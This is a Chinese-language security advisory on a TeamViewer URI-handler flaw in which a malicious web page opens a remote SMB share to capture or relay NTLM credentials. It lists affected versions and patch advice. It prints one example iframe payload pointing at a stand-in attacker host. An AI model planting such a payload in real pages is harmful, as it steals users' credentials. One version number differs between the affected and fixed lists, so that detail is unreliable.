一、情况分析

TeamViewer是由德国TeamViewer公司开发的一款用于远程控制、桌面共享的软件,可用于Windows,macOS,Linux等多种操作系统,是目前国内外应用最为广泛的远程访问程序之一。

近日,TeamViewer官方发布了TeamViewer URL处理的风险通告,TeamViewer存在未引用的搜索路径或元素的安全缺陷,攻击者不需要进行身份验证即可获取访问权限。

漏洞原理

TeamViewer存在未引用的搜索路径或元素的安全缺陷,由于应用程序没有正确引用其自定义URI处理程序,导致程序将参数视为系统命令而不是值。攻击者可以使用特制的URL(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')将恶意iframe嵌入恶意网站中,当安装了受影响TeamViewer软件的系统访问恶意网页时,使得用户WEB浏览器中加载该iframe,从而启动TeamViewer Windows桌面客户端程序并强制其打开远程SMB共享。

Windows将在打开SMB共享时,执行NTLM身份验证,并且可以转发该请求(使用如响应程序之类的工具)以执行代码(或捕获该请求以进行哈希破解)。

该漏洞的利用可以远程启动,并且由于是受害者的计算机发起与攻击者的SMB共享连接,因此攻击者不需要进行身份验证即可获取访问权限。

二、影响范围

TeamViewer < 8.0.258861

TeamViewer < 9.0.28860

TeamViewer < 10.0.258873

TeamViewer < 11.0.258870

TeamViewer < 12.0.258869

TeamViewer < 13.2.36220

TeamViewer < 14.2.56676

TeamViewer < 15.8.3

三、处置建议

目前厂商已发布补丁,补丁链接:https://www.teamviewer.com/en/download/previous-versions/,版本8.0.258861、9.0.258860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350和15.8.3中已修复,不受此漏洞影响。